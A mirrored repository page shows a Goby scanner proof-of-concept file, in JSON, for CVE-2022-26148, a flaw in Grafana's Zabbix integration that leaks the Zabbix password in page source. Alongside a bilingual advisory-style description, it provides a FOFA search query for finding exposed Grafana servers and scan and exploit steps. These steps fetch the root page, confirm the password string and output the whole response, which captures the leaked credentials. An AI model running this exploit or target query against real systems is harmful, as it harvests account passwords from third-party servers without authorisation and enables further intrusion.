qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/Grafana-Zabbix-Information-...

165 lines
6.9 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "Grafana Zabbix Information Leakage (CVE-2022-26148)",
"Description": "<p>Grafana is a set of open source monitoring tools provided by Grafana Labs that provide a visual monitoring interface. This tool is mainly used to monitor and analyze Graphite, InfluxDB and Prometheus, etc.<br></p><p>There is a security vulnerability in Grafana 7.3.4 and earlier versions, which originates from the integration of Grafana 7.3.4 and earlier versions with Zabbix, Zabbix password can be found in the api_jsonrpc.php HTML source code. When users log in or register, they can right-click to view the source code, use Ctrl-F to search for password in api_jsonrpc.php, and find Zabbix's account password and URL address.<br></p>",
"Product": "Grafana",
"Homepage": "https://grafana.com",
"DisclosureDate": "2022-03-30",
"Author": "abszse",
"FofaQuery": "title=\"Grafana\" && body=\"alexanderzobnin-zabbix-datasource\"",
"GobyQuery": "title=\"Grafana\" && body=\"alexanderzobnin-zabbix-datasource\"",
"Level": "3",
"Impact": "p>There is a security vulnerability in Grafana 7.3.4 and earlier versions, which originates from the integration of Grafana 7.3.4 and earlier versions with Zabbix, Zabbix password can be found in the api_jsonrpc.php HTML source code. When users log in or register, they can right-click to view the source code, use Ctrl-F to search for password in api_jsonrpc.php, and find Zabbix's account password and URL address.<br></p>",
"Recommendation": "<p>Pay attention to the official website update in time: <a href=\"https://grafana.com/grafana/download\">https://grafana.com/grafana/download</a><br></p>",
"References": [
"https://2k8.org/post-319.html"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "zabbix",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "alexanderzobnin-zabbix-datasource",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "password\":\"",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "alexanderzobnin-zabbix-datasource",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "password",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"Tags": [
"Information Disclosure"
],
"VulType": [
"Information Disclosure"
],
"CVEIDs": [
"CVE-2022-26148"
],
"CNNVD": [
"CNNVD-202203-1938"
],
"CNVD": [
""
],
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "Grafana 集成 Zabbix 存在信息泄露漏洞(CVE-2022-26148)",
"Product": "Grafana",
"Description": "<p>Grafana是Grafana实验室的一套提供可视化监控界面的开源监控工具。该工具主要用于监控和分析Graphite、InfluxDB和Prometheus等。<br></p><p>Grafana 7.3.4版本及之前版本存在安全漏洞该漏洞源于Grafana 7.3.4版本及之前版本与 Zabbix 集成时Zabbix 密码可以在 api_jsonrpc.php HTML 源代码中找到。当用户登录或注册时可以右键查看源码使用Ctrl-F在api_jsonrpc.php中搜索password可以发现Zabbix的账号密码和URL地址。<br></p>",
"Recommendation": "<p>及时关注官网更新:<a href=\"https://grafana.com/grafana/download\">https://grafana.com/grafana/download</a><br></p>",
"Impact": "<p>Grafana 7.3.4版本及之前版本存在安全漏洞该漏洞源于Grafana 7.3.4版本及之前版本与 Zabbix 集成时Zabbix 密码可以在 api_jsonrpc.php HTML 源代码中找到。当用户登录或注册时可以右键查看源码使用Ctrl-F在api_jsonrpc.php中搜索password可以发现Zabbix的账号密码和URL地址。<br></p>",
"VulType": [
"信息泄漏"
],
"Tags": [
"信息泄漏"
]
},
"EN": {
"Name": "Grafana Zabbix Information Leakage (CVE-2022-26148)",
"Product": "Grafana",
"Description": "<p>Grafana is a set of open source monitoring tools provided by Grafana Labs that provide a visual monitoring interface. This tool is mainly used to monitor and analyze Graphite, InfluxDB and Prometheus, etc.<br></p><p>There is a security vulnerability in Grafana 7.3.4 and earlier versions, which originates from the integration of Grafana 7.3.4 and earlier versions with Zabbix, Zabbix password can be found in the api_jsonrpc.php HTML source code. When users log in or register, they can right-click to view the source code, use Ctrl-F to search for password in api_jsonrpc.php, and find Zabbix's account password and URL address.<br></p>",
"Recommendation": "<p>Pay attention to the official website update in time: <a href=\"https://grafana.com/grafana/download\">https://grafana.com/grafana/download</a><br></p>",
"Impact": "<p>There is a security vulnerability in Grafana 7.3.4 and earlier versions, which originates from the integration of Grafana 7.3.4 and earlier versions with Zabbix, Zabbix password can be found in the api_jsonrpc.php HTML source code. When users log in or register, they can right-click to view the source code, use Ctrl-F to search for password in api_jsonrpc.php, and find Zabbix's account password and URL address.<br></p>",
"VulType": [
"Information Disclosure"
],
"Tags": [
"Information Disclosure"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}
Reference in New Issue View Git Blame Copy Permalink